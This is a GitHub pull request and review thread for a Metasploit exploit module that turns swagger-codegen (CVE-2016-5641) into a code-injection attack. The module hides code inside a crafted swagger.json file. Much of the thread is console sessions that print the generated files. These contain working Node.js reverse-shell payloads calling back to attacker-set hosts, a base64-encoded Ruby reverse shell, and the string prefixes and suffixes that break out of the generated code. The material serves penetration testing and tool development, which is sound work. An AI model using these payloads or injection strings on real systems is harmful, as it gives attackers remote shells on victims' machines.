### PR TITLE
Add JSON Swagger CodeGen Parameter Injector (CVE-2016-5641)

### PR DESCRIPTION
**Pull request by sdavis-r7**
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/multi/fileformat/swagger_param_inject`
- [x] `set PAYLOAD nodejs/shell_reverse_tcp`
- [x] `set LPORT 4444`
- [x] `set LHOST 1.2.3.4`
- [x] `run`
- [x] did you see a swagger file dressed in JSON?  win!
- [x] **Verify** that the payload generated is as expected.

### CODE REVIEW

**Comment by todb-r7** [comment]
Updated test sequence. Got this -- the payload seems wrong to me. Can you confirm @sdavis-r7 ? Seems like we need to set some sensible defaults here.

```json
      {
          "swagger": "2.0",
          "info": {
              "description": "1Û÷ãSCSj°fáÍ[h¬Ìh [....]
```

**Comment by sdavis-r7** [comment]
oh darn, there it is again!  forgot the default again.  you are correct.  updating shortly...

**Comment by sdavis-r7** [comment]
@todb-r7  do you feel this is an 'ok' approach to the default payload?

**Comment by todb-r7** [comment]
Roping in @wvu-r7 for a little help here. The module does not currently accept nodejs/* as a payload:

```
msf exploit(swagger_param_inject) > set PAYLOAD nodejs/shell_reverse_tcp[-] The value specified for PAYLOAD is not valid.
```

It looks like @sdavis-r7 was accidentally overriding PAYLOAD by setting it first, *then* using the module. (Which kind of feels like a bug where you can set an arbitrary payload then run the exploit even if the payload is invalid, but never mind that).

**Comment by sdavis-r7** [comment]
example of what I had tested.

```
set PAYLOAD nodejs/shell_reverse_tcp
use exploit/multi/fileformat/swagger_param_inject

set INFO_VERSION "1.0.0"
set PAYLOAD_LOC "PATH"
set PAYLOAD_PREFIX "/a');};};return exports;}));"
set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"

set LHOST 192.168.68.138 
set LPORT 4444

run 
```

File: modules/exploits/multi/fileformat/swagger_param_inject.rb [hunk 1]
```diff
@@ -0,0 +1,149 @@
...
+        OptPort.new('LPORT', [true, 'Server port.']),
+        OptString.new('PAYLOAD', [false, 'Payload Injection']),
+        OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
+        OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
+        OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point','INFO_DESCRIPTION']),
+        OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
+        OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']),
+        OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
+        OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
+        OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4', 'X.Y.Z.xyz']),
```
Comment (egypt) [inline modules/exploits/multi/fileformat/swagger_param_inject.rb]: This should probably not have a default

File: modules/exploits/multi/fileformat/swagger_param_inject.rb [hunk 2]
```diff
@@ -0,0 +1,149 @@
...
+      'Platform'       => %w{ nodejs php java linux ruby },
+      'Targets'        => [['Automatic', {}]],
+      'DisclosureDate' => 'Jun 23 2016',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']),
+        OptPort.new('LPORT', [true, 'Server port.']),
+        OptString.new('PAYLOAD', [false, 'Payload Injection']),
```
Comment (egypt) [inline modules/exploits/multi/fileformat/swagger_param_inject.rb]: No need to register this. Exploits always have a `PAYLOAD` option.

File: modules/exploits/multi/fileformat/swagger_param_inject.rb [hunk 3]
```diff
@@ -0,0 +1,149 @@
...
+        OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
+        OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
+        OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point','INFO_DESCRIPTION']),
```
Comment (egypt) [inline modules/exploits/multi/fileformat/swagger_param_inject.rb]: This should probably have an array of acceptable values at the end, like:
```ruby
OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE'] ]),

**Comment by todb-r7** [comment]
Okay with this diff:

```diff
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules
index 498e20a..aa56c7b 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],
           [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06
         ],
-      'Platform'       => %w{ nodejs php java linux ruby },
+      'Platform'       => %w{ nodejs },
+      'Arch'           => ARCH_NODEJS,
       'Targets'        => [['Automatic', {}]],
       'DisclosureDate' => 'Jun 23 2016',
       'DefaultTarget'  => 0))
```

Seems to work, but now it's limited to just nodejs.

@wvu-r7, @wchen-r7 ,  is it possible to have a multi-arch module? I don't see any examples.

Results:

```
msf > use exploit/multi/fileformat/swagger_param_inject 
msf exploit(swagger_param_inject) > set LPORT 4444
LPORT => 4444
msf exploit(swagger_param_inject) > run

[*] 
      {
          "swagger": "2.0",
          "info": {
              "description": "A",
              "version": "B",
[...snip...]

[+]  stored at /home/todb/.msf4/local/local_1466694044.bin
msf exploit(swagger_param_inject) > set PAYLOAD 
set PAYLOAD generic/custom
set PAYLOAD generic/shell_bind_tcp
set PAYLOAD generic/shell_reverse_tcp
set PAYLOAD nodejs/shell_bind_tcp
set PAYLOAD nodejs/shell_reverse_tcp
set PAYLOAD nodejs/shell_reverse_tcp_ssl
msf exploit(swagger_param_inject) > set PAYLOAD nodejs/shell_reverse_tcp
PAYLOAD => nodejs/shell_reverse_tcp
msf exploit(swagger_param_inject) > run

[*] 
      {
          "swagger": "2.0",
          "info": {
              "description": " (function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; client.socket = net.connect(4444, \"172.16.24.204\", function() { client.socket.pipe(sh.stdin); util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); }); })();",
              "version": "B",
              "title": "C"
[...snip...]

[+]  stored at /home/todb/.msf4/local/local_1466694075.bin

```

**Comment by todb-r7** [comment]
@egypt this doesn't seem to work as I'd (naively) expect:

```diff
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules
index 498e20a..a1ef861 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -40,8 +40,14 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],
           [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06
         ],
-      'Platform'       => %w{ nodejs php java linux ruby },
-      'Targets'        => [['Automatic', {}]],
+      'Platform'       => %w{ nodejs php java ruby },
+      'Arch'           => %w{ ARCH_NODEJS ARCH_PHP ARCH_JAVA ARCH_RUBY},
+      'Targets'        => [
+        ['NodeJS', { 'Arch' => ARCH_NODEJS}],
+        ['PHP', { 'Arch' => ARCH_PHP}],
+        ['Java', { 'Arch' => ARCH_JAVA}],
+        ['Ruby', { 'Arch' => ARCH_RUBY}]
+      ],
       'DisclosureDate' => 'Jun 23 2016',
       'DefaultTarget'  => 0))
```

**Comment by todb-r7** [comment]
Added a default filename locally, will push with the merge, results here:

```
msf > use exploit/multi/fileformat/swagger_param_inject 
msf exploit(swagger_param_inject) > set PAYLOAD nodejs/shell_reverse_tcp
PAYLOAD => nodejs/shell_reverse_tcp
msf exploit(swagger_param_inject) > set LPORT 4444
LPORT => 4444
msf exploit(swagger_param_inject) > run

[-] Exploit failed: The following options failed to validate: LHOST, SWAGGER_HOST.
msf exploit(swagger_param_inject) > set LHOST 1.2.3.4
LHOST => 1.2.3.4
msf exploit(swagger_param_inject) > set SWAGGER_HOST swagger.example.com
SWAGGER_HOST => swagger.example.com
msf exploit(swagger_param_inject) > run

[*] 
      {
          "swagger": "2.0",
          "info": {
              "description": " (function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; client.socket = net.connect(4444, \"1.2.3.4\", function() { client.socket.pipe(sh.stdin); util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); }); })();",
              "version": "B",
              "title": "C"
          },
          "schemes": [
              "http"
          ],
          "host": "swagger.example.com",
          "basePath": "/",
          "produces": [
              "application/json"
          ],
          "consumes": [
              "application/json"
          ],
          "paths": {
              "/a": {
                  "get": {
                      "description": "D",
                      "responses": {
                          "200": {
                              "description": "E",
                              "schema": {
                                  "$ref": "#/definitions/d"
                              }
                          }
                      }
                  }
              }
          },
          "definitions": {
              "d": {
                  "type": "object",
                  "description": "F",
                  "properties": {
                      "id": {
                          "type": "integer",
                          "format": "int64"
                      }
                  }
              }
          }
      }
    
[+] msf-swagger.json stored at /home/todb/.msf4/local/msf-swagger.json
msf exploit(swagger_param_inject) > 
```

**Comment by egypt** [comment]
```diff
diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb
index f8bdc91..f4112ca 100644
--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@@ -40,9 +40,13 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ],
           [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ]
         ],
-      'Platform'       => %w{ nodejs },
-      'Arch'           => ARCH_NODEJS,
-      'Targets'        => [['Automatic', {}]],
+      'Platform'       => %w{ nodejs ruby },
+      'Arch'           => [ ARCH_NODEJS, ARCH_RUBY ],
+      'Targets'        => [
+        ['Automatic', {}],
+        ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ],
+        ['Ruby', { 'Platform' => 'ruby', 'Arch' => ARCH_RUBY } ],
+      ],
       'DisclosureDate' => 'Jun 23 2016',
       'DefaultTarget'  => 0))
 
```

**Comment by todb-r7** [comment]
Ooh, @egypt , that works? sweet!

**Comment by egypt** [comment]
The way this format looks, it seems like you should be able to stuff multiple payloads in it. Would be tricky if not impossible as a module, though, having 4 different payloads with different architectures/platforms simultaneously.

**Comment by egypt** [comment]
Great work, @sdavis-r7 !

**Comment by todb-r7** [comment]
Okay let's see if I can untangle this then.

**Comment by sdavis-r7** [comment]
Thank you @egypt and @todb-r7 for fantastic contribution/comment!

**Comment by todb-r7** [comment]
So, I'm unconvinced Egypt's strategy works. I've untangled things, I think, and now I get no payload selection.

Here:

https://github.com/sdavis-r7/metasploit-framework/compare/master...todb-r7:return-of-multiarch?expand=1

**Comment by todb-r7** [comment]
Ah wait this is better. One sec.

**Comment by egypt** [comment]
@todb-r7 It doesn't work for you because you didn't follow my diff. =)

'Arch' needs to be a normal literal array because %w{} converts to strings:
```
>> [ ARCH_NODEJS ]
=> ["nodejs"]
>> %w{ ARCH_NODEJS }
=> ["ARCH_NODEJS"]
```

**Comment by wchen-r7** [comment]
The RC files should be in the scripts/resource directory?

**Comment by todb-r7** [comment]
@jlee-r7 fixed up, works much nicer now.

@wchen-r7 should they? It's no secret I've been out of it on module dev for a while, I thought maybe they lived in docs now. If we're back in the business of taking rc files, then yes. If they're not appropriate for docs and if we don't care to pick up new RC scripts, we can just toss them. The defaults now all seem to do what they should.

**Comment by wchen-r7** [comment]
@todb-r7 Yeah we still take RC files. It's just that the documentation/modules/ directory has a special purpose for the info command in msfconsole. First off you need to rename the README.md as ```documentation/modules/exploit/multi/fileformat/swagger_param_inject.md```, so that when you use ```info -d```, you can see that documentation. As for the RC files, the ```info -d``` command ignores anything that's not *.md, so it doesn't see those RC files. We've been storing the RC files in scripts/resource, so I figured we should probably still put them there.

**Comment by egypt** [comment]
It looks like the rc files are for setting prefix/suffix values. It's a little weird to me that the code prefix/suffix are user options at all. Is there a reason they're not just part of the module?

**Comment by todb-r7** [comment]
@egypt @wchen-r7 I think I've addressed all your concerns here. @sdavis-r7 , take a look and double check I didn't miss anything?

**Comment by sdavis-r7** [comment]
@todb-r7 checkin' now...

**Comment by todb-r7** [comment]
@sdavis-r7 , assuming I haven't kneecapped this module by taking the RC's out and transplanting them into hardcoded variables, I think this is GTG. IOW, if you're happy with it, I'm happy with it.

**Comment by sdavis-r7** [comment]
@todb-r7 Pretty dang sweet.  👍   👍  @wchen-r7  @egypt

**Comment by sdavis-r7** [comment]
@todb-r7 one small change of the docs needed (no more prefix/suffic mumbo jumbo).  doing that now

**Comment by todb-r7** [comment]
Ah, @sdavis-r7 just looked at `info -d` and looks like the docs need to be updated to reflect a) chosing the payload, and b) not having to set all the extra options I just took out. Could you?

**Comment by todb-r7** [comment]
@sdavis-r7 read my mind

File: modules/exploits/multi/fileformat/swagger_param_inject.rb [hunk 4]
```diff
@@ -0,0 +1,170 @@
...
+    super(update_info(info,
+      'Name'           => 'JSON Swagger CodeGen Parameter Injector',
+      'Description'    => %q{
+        This module generates a Open API Specification 2.0 (Swagger) compliant json
+        document that includes payload insertion points in parameters.
+
+        In order for the payload to be executed, an attacker must convince someone to
+        open a specially modified swagger.json file with with a vulnerable swagger-codgen
+        appliance/container/api/service. By doing so, an attacker can
+        execute arbitrary code as the victim user.
```
Comment (ePaul) [inline modules/exploits/multi/fileformat/swagger_param_inject.rb]: Maybe clearer wording:

I would reword this sentence with this:

> In order for the payload to be executed, an attacker must convince someone to generate code from a specially modified swagger.json file (the same exploit works also with the YAML format) with with a vulnerable swagger-codgen appliance/container/api/service, and then to execute that generated code (or include it into software which will later be executed by another victim). By doing so, an attacker can execute arbitrary code as the victim user.

**Comment by sdavis-r7** [comment]
confused by build fail... :/

**Comment by egypt** [comment]
@todb @sdavis-r7 It looks like it's no longer actually putting a payload in the output for me:

```
10:41:43 %W j:0 s:0 exploit(swagger_param_inject) > run

[*] 
      {
          "swagger": "2.0",
          "info": {
              "description": "A",
              "version": "1.0.0",
              "title": "C"
          },
          "schemes": [
              "http"
          ],
          "host": "swagger.example.com",
          "basePath": "/",
          "produces": [
              "application/json"
          ],
          "consumes": [
              "application/json"
          ],
          "paths": {
              "/a": {
                  "get": {
                      "description": "D",
                      "responses": {
                          "200": {
                              "description": "E",
                              "schema": {
                                  "$ref": "#/definitions/d"
                              }
                          }
                      }
                  }
              }
          },
          "definitions": {
              "d": {
                  "type": "object",
                  "description": "F",
                  "properties": {
                      "id": {
                          "type": "integer",
                          "format": "int64"
                      }
                  }
              }
          }
      }
    
[+] msf-swagger.json stored at /home/egypt/.msf4/local/msf-swagger.json
```

**Comment by sdavis-r7** [comment]
@egypt  which payload did you specify?  just tested the js/node with success.  will try the others now

```
msf > use exploit/multi/fileformat/swagger_param_inject
msf exploit(swagger_param_inject) > set PAYLOAD nodejs/shell_reverse_tcp

PAYLOAD => nodejs/shell_reverse_tcp
msf exploit(swagger_param_inject) >
msf exploit(swagger_param_inject) > set INFO_VERSION "1.0.0"
INFO_VERSION => 1.0.0
msf exploit(swagger_param_inject) > set SWAGGER_HOST "localhost"
SWAGGER_HOST => localhost
msf exploit(swagger_param_inject) > run

[-] Exploit failed: The following options failed to validate: LHOST, LPORT.
msf exploit(swagger_param_inject) > set LHOST localhost
LHOST => localhost
msf exploit(swagger_param_inject) > set LPORT 4444
LPORT => 4444
msf exploit(swagger_param_inject) > run

[*]
      {
          "swagger": "2.0",
          "info": {
              "description": "A",
              "version": "1.0.0",
              "title": "C"
          },
          "schemes": [
              "http"
          ],
          "host": "localhost",
          "basePath": "/",
          "produces": [
              "application/json"
          ],
          "consumes": [
              "application/json"
          ],
          "paths": {
              "/a');};};return exports;})); (function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; client.socket = net.connect(4444, \"localhost\", function() { client.socket.pipe(sh.stdin); util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); }); })();(function(){}(this,function(){a=function(){b=function(){new Array('": {
                  "get": {
                      "description": "D",
                      "responses": {
                          "200": {
                              "description": "E",
                              "schema": {
                                  "$ref": "#/definitions/d"
                              }
                          }
                      }
                  }
              }
          },
          "definitions": {
              "d": {
                  "type": "object",
                  "description": "F",
                  "properties": {
                      "id": {
                          "type": "integer",
                          "format": "int64"
                      }
                  }
              }
          }
      }
```

**Comment by sdavis-r7** [comment]
php, ruby & java fail

```
msf exploit(swagger_param_inject) > set PAYLOAD php/meterpreter/reverse_tcp
[-] The value specified for PAYLOAD is not valid.

msf exploit(swagger_param_inject) > set PAYLOAD ruby/shell_reverse_tcp
[-] The value specified for PAYLOAD is not valid.

msf exploit(swagger_param_inject) > set PAYLOAD java/jsp_shell_reverse_tcp
[-] The value specified for PAYLOAD is not valid.
```

whereas nodejs is happy

```
msf exploit(swagger_param_inject) > set PAYLOAD nodejs/shell_reverse_tcp
PAYLOAD => nodejs/shell_reverse_tcp
```


Also, only generic & NodeJS show up.  Not sure if I am doing something completely wrong... @todb-r7  @egypt 

```
msf > use exploit/multi/fileformat/swagger_param_inject
msf exploit(swagger_param_inject) > show payloads

Compatible Payloads
===================

   Name                          Disclosure Date  Rank    Description
   ----                          ---------------  ----    -----------
   generic/custom                                 normal  Custom Payload
   generic/shell_bind_tcp                         normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                      normal  Generic Command Shell, Reverse TCP Inline
   nodejs/shell_bind_tcp                          normal  Command Shell, Bind TCP (via nodejs)
   nodejs/shell_reverse_tcp                       normal  Command Shell, Reverse TCP (via nodejs)
   nodejs/shell_reverse_tcp_ssl                   normal  Command Shell, Reverse TCP SSL (via nodejs)
```

**Comment by todb-r7** [comment]
Right. So now, correct payload selection is governed by setting a target.

```
msf exploit(swagger_param_inject) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   NodeJS
   1   PHP
   2   Java
   3   Ruby


msf exploit(swagger_param_inject) > set target 3
target => 3
msf exploit(swagger_param_inject) > set payload 
set payload generic/custom              set payload ruby/shell_bind_tcp_ipv6
set payload generic/shell_bind_tcp      set payload ruby/shell_reverse_tcp
set payload generic/shell_reverse_tcp   set payload ruby/shell_reverse_tcp_ssl
set payload ruby/shell_bind_tcp         
msf exploit(swagger_param_inject) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf exploit(swagger_param_inject) > run

[*] 
      {
          "swagger": "2.0",
          "info": {
              "description": "A",
              "version": "1.0.0",
              "title": "=end code = %(cmVxdWlyZSAnc29ja2V0JztjPVRDUFNvY2tldC5uZXcoIjEuMi4zLjQiLCA0NDQ0KTskc3RkaW4ucmVvcGVuKGMpOyRzdGRvdXQucmVvcGVuKGMpOyRzdGRlcnIucmVvcGVuKGMpOyRzdGRpbi5lYWNoX2xpbmV7fGx8bD1sLnN0cmlwO25leHQgaWYgbC5sZW5ndGg9PTA7KElPLnBvcGVuKGwsInJiIil7fGZkfCBmZC5lYWNoX2xpbmUge3xvfCBjLnB1dHMoby5zdHJpcCkgfX0pIHJlc2N1ZSBuaWwgfQ==).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen(%(ruby), %(wb)) rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end=begin "
          },
          "schemes": [
              "http"
          ],
          "host": "example.com",
```

The default target is nodejs, so those will be selectable.

@egypt is there a better way?

**Comment by egypt** [comment]
Tracked it down to `generic/shell_reverse_tcp` being the default that gets chosen when you don't specify a payload. When that happens `payload.arch[0]` isn't in the list of expected archs, so it silently falls through and doesn't embed the payload. I'm working on figuring out a better way to deal with this.

**Comment by todb-r7** [comment]
Thanks @egypt!

**Comment by sdavis-r7** [comment]
Awesomeness!  Woot!  Thank you @egypt !

**Comment by wvu-r7** [comment]
Yes, thanks!

**Comment by join-us** [comment]
Could you show the `Environment Setup` part in the doc ?

**Comment by sdavis-r7** [comment]
@join-us  is this okie?  https://github.com/rapid7/metasploit-framework/pull/7023

**Comment by join-us** [comment]
@sdavis-r7  Could you share how to setup a vuln lab with nodejs or something you want ?

**Comment by join-us** [comment]
@sdavis-r7 request a local vuln lab for exploit test.

**Comment by youdy3000** [comment]
Hi @egypt, are you planning on putting this exploit into the main branch?  I am running the new version (metasploit v4.12.7-dev on Kali Linux).  But I cannot see the exploit when I try: _use exploit/multi/fileformat/swagger_param_inject_

When I msfupdate I don't get @sdavis-r7 exploit.

**Comment by wvu-r7** [comment]
@rustymagnet3000: I don't think an update is out yet. You'll see it. This exploit is already in the main branch if you use Git.

**Comment by sdavis-r7** [comment]
@join-us  I would love to!  I am trying to figure out to what you refer to and what to request...  

A request to spin up a vuln lab that gets setup with the vuln components and then snapshot it for others to play with?  or... ?

**Comment by join-us** [comment]
Thanks @sdavis-r7. Double ideas for you, and you can prefer one or both ideas:

- A **vmware**/**virtualbox** vuln lab can be used by others directly. 
- A **documentation** is for how to setup a vuln lab.

**Comment by Tounsi007** [comment]
Hello,
How can I understand that he's succeeded and what the result content on msg-swagger.json

**Comment by Tounsi007** [comment]
Please i need help !!

**Comment by bcoles** [comment]
@Tounsi007 the Metasploit issue tracker is for tracking issues with Metasploit. For questions and support, drop by the IRC channel or Slack. You can find the details here:

* https://www.metasploit.com/help

**Pull request merged**